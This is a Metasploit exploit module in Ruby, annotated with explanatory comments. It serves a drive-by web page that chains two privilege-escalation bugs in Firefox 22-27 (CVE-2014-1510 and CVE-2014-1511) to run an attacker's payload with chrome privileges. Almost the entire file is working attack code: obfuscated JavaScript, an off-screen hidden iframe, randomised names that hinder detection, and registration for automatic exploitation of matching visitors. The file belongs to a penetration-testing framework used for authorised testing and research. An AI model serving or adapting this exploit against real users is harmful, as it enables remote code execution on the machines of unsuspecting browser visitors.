GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/firefox_webidl_injection.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/exploitation/jsobfu'
class MetasploitModule < Msf::Exploit::Remote
  # Browser exploit for Firefox 22-27 that chains the two privilege-escalation
  # bugs listed under 'References' (CVE-2014-1510, CVE-2014-1511). The served
  # page moves from content JavaScript into a chrome-privileged window and
  # then runs the script returned by +run_payload+ (FirefoxPrivilegeEscalation
  # mixin) through +messageManager.loadFrameScript+.
  #
  # Exposure is bounded by the version gate in 'BrowserRequirements': only
  # Firefox whose major version is 22..27 is treated as exploitable, so later
  # releases are not served the chain.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # BrowserAutopwn registration: Firefox user agents 22.0-27.0 with
  # JavaScript enabled.
  autopwn_info({
    :ua_name => HttpClients::FF,
    :ua_minver => "22.0",
    :ua_maxver => "27.0",
    :javascript => true,
    :rank => ExcellentRanking
  })

  # Module metadata: name, description, references, targets and the browser
  # requirements used to decide whether a visitor receives the exploit page.
  #
  # @param info [Hash] module info merged by +update_info+ and passed to +super+
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Firefox WebIDL Privileged Javascript Injection',
      'Description' => %q{
This exploit gains remote code execution on Firefox 22-27 by abusing two
separate privilege escalation vulnerabilities in Firefox's Javascript
APIs.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Marius Mlynski', # discovery and pwn2own exploit
        'joev' # metasploit module
      ],
      'DisclosureDate' => '2014-03-17',
      'References' => [
        ['CVE', '2014-1510'], # open chrome:// url in iframe
        ['CVE', '2014-1511'] # bypass popup blocker to load bare ChromeWindow
      ],
      'Targets' => [
        [
          # Payload that runs inside Firefox's privileged JavaScript context.
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          # Native payload for one of the listed host platforms.
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch' => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      # Version gate: +to_i+ keeps only the major version, so any 27.x build
      # passes here even though autopwn_info above lists "27.0" as the maximum.
      'BrowserRequirements' => {
        :source => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver => lambda { |ver| ver.to_i.between?(22, 27) }
      }
    ))

    # Operator-supplied HTML that generate_html inserts into the page body
    # verbatim (no escaping); empty by default.
    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ])
  end

  # BrowserExploitServer callback: answer a request from a matching browser
  # with the generated exploit page.
  #
  # @param cli [Object] client connection supplied by the server mixin
  # @param request [Object] the HTTP request (not used here)
  # @param target_info [Hash] passed through to generate_html, which does not
  #   currently read it
  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end

  # Builds the HTML document served to the browser.
  #
  # The payload script from +run_payload+ is embedded as the value of a
  # random JSON key; obfuscated JavaScript then drives the three polling
  # steps commented inline below (chrome:// load into the hidden iframe,
  # data: URI into its internal frame, bare chrome window with a mozBrowser
  # iframe) and finally hands the script to +messageManager.loadFrameScript+.
  # All generated names (JSON key, iframe name, window name) are randomised
  # per request via +rand_text_alpha+, so the fixed parts of the script (the
  # chrome://browser/content/browser.xul URL and the mozRTCPeerConnection
  # calls) are what a content-based detection rule can rely on. The JSON
  # object is the only place the payload text appears in the page.
  #
  # @param target_info [Hash] unused; kept for the callback signature
  # @return [String] complete HTML page, including datastore['CONTENT']
  #   unescaped
  def generate_html(target_info)
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
    r = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
    # Document loaded into the chrome:// frame's internal frame by step1; it
    # opens the bare chrome window (top.vvv) that step2 and step3 drive.
    # 'r' is the window name; base64-encoded before it is placed in the script.
    data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
      "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
      "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"

    # js_obfuscate comes from rex/exploitation/jsobfu (required at the top of
    # the file). The window.open target '#{frame}' is the name of the hidden
    # iframe in the markup below.
    js = js_obfuscate %Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];

// Load the chrome-privileged browser XUL script into an iframe
var c = new mozRTCPeerConnection;
c.createOffer(function(){},function(){
window.open('chrome://browser/content/browser.xul', '#{frame}');
step1();
});

// Inject a data: URI into an internal frame inside of the browser
// XUL script to pop open a new window with the chrome flag to prevent
// the new window from being wrapped with browser XUL;
function step1() {
var clear = setInterval(function(){

// throws until frames[0].frames[2] is available (when chrome:// iframe loads)
frames[0].frames[2].location;

// we base64 this to avoid the script tag screwing up things when obfuscated
frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
clearInterval(clear);
setTimeout(step2, 100);
},10);
}

// Step 2: load the chrome-level window up with a data URI, which
// gives us same-origin. Make sure to load an "<iframe mozBrowser>"
// into the frame, since that will respond to our messageManager
// (this is important later)
function step2() {
var clear = setInterval(function(){
top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
'src="about:blank"></iframe></body></html>';
clearInterval(clear);
setTimeout(step3, 100);
}, 10);
}

function step3() {
var clear = setInterval(function(){
if (!frames[0]) return; // will throw until the frame is accessible
top.vvv.messageManager.loadFrameScript('data:,'+key, false);
clearInterval(clear);
setTimeout(function(){top.vvv.close();}, 100);
}, 10);
}
|

    # Page markup: an off-screen iframe named after 'frame' (the window.open
    # target), the obfuscated script, and the raw CONTENT option.
    %Q|
<!doctype html>
<html>
<body>
<iframe id='#{frame}' name='#{frame}'
style='position:absolute;left:-9999999px;height:1px;width:1px;'>
</iframe>
<script>
#{js}
</script>
#{datastore['CONTENT']}
</body>
</html>
|
  end
end